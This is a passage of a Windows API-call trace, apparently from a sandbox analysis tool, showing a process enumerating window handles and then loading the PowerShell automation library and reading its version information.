	[0923.803] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1858
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1664
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x10b4
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x10ac
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x10ec
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1068
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x17e0
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x102c
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x17a4
	[0923.804] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1050
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1694
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1770
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1720
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x165c
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1578
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x16c0
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x161c
	[0923.805] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1638
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x15c8
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1554
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1674
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1520
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x14bc
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xf8c
	[0923.806] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe9c
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1434
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x14ec
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xfcc
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x12ac
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1484
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x934
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc0c
	[0923.807] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xb08
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x948
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1178
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x13e0
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xcd0
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x13fc
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xdc8
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc18
	[0923.808] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc2c
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa1c
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1244
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xdb0
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1398
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1358
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1370
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1340
	[0923.809] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x130c
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x12c0
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x12e4
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1270
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1298
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x120c
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x122c
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x11c4
	[0923.810] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x11b0
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1188
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1148
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1160
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x10fc
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe34
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xea4
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x514
	[0923.811] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe48
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xbc8
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xdf8
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x318
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xcac
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x8bc
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xf9c
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xf48
	[0923.812] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe40
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xecc
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xeb8
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe80
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe98
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe60
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xee4
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xf00
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xdf0
	[0923.813] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xe1c
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xdd0
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xd94
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xd74
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xd00
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xcd8
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc84
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xca4
	[0923.814] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc64
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xc24
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xb84
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xbac
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x384
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xab8
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x33c
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa44
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa64
	[0923.815] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x8a8
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xaf0
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x88c
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xb04
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x910
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x230
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xac0
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xab4
	[0923.816] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xaac
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x3d0
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x978
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa7c
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x59c
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa88
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa6c
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa68
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x9f8
	[0923.817] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xa04
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x924
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x8dc
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x7dc
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x768
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x764
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x820
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x810
	[0923.818] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x794
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x83c
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x7ac
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xb44
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x6bc
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0xb5c
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x838
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.819] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x4d0
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x818
	[0923.820] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x5b8
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x494
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x1ec
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x440
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x7e8
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x730
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x2c8
	[0923.821] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12da80 | out: lpdwProcessId=0x12da80) returned 0x31c
	[0923.825] WerSetFlags () returned 0x0
	[0923.834] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0925.137] CoTaskMemFree (pv=0x0) 
	[0925.138] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dde8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dde0 | out: pulNumLanguages=0x12dde8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dde0) returned 1
	[0925.138] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dde8, pwszLanguagesBuffer=0x2c5f530, pcchLanguagesBuffer=0x12dde0 | out: pulNumLanguages=0x12dde8, pwszLanguagesBuffer=0x2c5f530, pcchLanguagesBuffer=0x12dde0) returned 1
	[0925.144] CoTaskMemAlloc (cb=0x24) returned 0x343b10
	[0925.144] GetUserDefaultLocaleName (in: lpLocaleName=0x343b10, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0925.145] CoTaskMemFree (pv=0x343b10) 
	[0925.172] CoTaskMemAlloc (cb=0x104) returned 0x29cfb0
	[0925.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29cfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.172] CoTaskMemFree (pv=0x29cfb0) 
	[0925.175] CoTaskMemAlloc (cb=0x104) returned 0x29cfb0
	[0925.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29cfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.175] CoTaskMemFree (pv=0x29cfb0) 
	[0925.989] CoTaskMemAlloc (cb=0x104) returned 0x29cfb0
	[0925.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29cfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.989] CoTaskMemFree (pv=0x29cfb0) 
	[0926.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.000] SetErrorMode (uMode=0x1) returned 0x1
	[0926.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12da60 | out: lpFileInformation=0x12da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0926.000] SetErrorMode (uMode=0x1) returned 0x1
	[0926.000] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dcd0 | out: lpdwHandle=0x12dcd0) returned 0x94c
	[0926.002] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c62dc0 | out: lpData=0x2c62dc0) returned 1
	[0926.003] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c62e5c, puLen=0x12dc40) returned 1
	[0926.003] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c62f38, puLen=0x12dbb0) returned 1
	[0926.003] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0926.003] CoTaskMemAlloc (cb=0x2e) returned 0x342870
	[0926.003] lstrcpyW (in: lpString1=0x342870, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0926.003] CoTaskMemFree (pv=0x342870) 
	[0926.003] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c62f8c, puLen=0x12dbb0) returned 1
	[0926.003] lstrlenW (lpString="System.Management.Automation") returned 28
	[0926.003] CoTaskMemAlloc (cb=0x3c) returned 0x2fc0b0
	[0926.003] lstrcpyW (in: lpString1=0x2fc0b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0926.003] CoTaskMemFree (pv=0x2fc0b0) 
	[0926.003] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c62fe8, puLen=0x12dbb0) returned 1
	[0926.005] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0926.005] CoTaskMemAlloc (cb=0x20) returned 0x343b70
	[0926.005] lstrcpyW (in: lpString1=0x343b70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0926.005] CoTaskMemFree (pv=0x343b70) 
	[0926.005] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c63028, puLen=0x12dbb0) returned 1
	[0926.005] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0926.005] CoTaskMemAlloc (cb=0x44) returned 0x2fc0b0
	[0926.005] lstrcpyW (in: lpString1=0x2fc0b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0926.005] CoTaskMemFree (pv=0x2fc0b0) 
	[0926.005] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c63090, puLen=0x12dbb0) returned 1
	[0926.005] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0926.006] CoTaskMemAlloc (cb=0x76) returned 0x2e86c0
	[0926.006] lstrcpyW (in: lpString1=0x2e86c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0926.006] CoTaskMemFree (pv=0x2e86c0) 
	[0926.006] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c6312c, puLen=0x12dbb0) returned 1
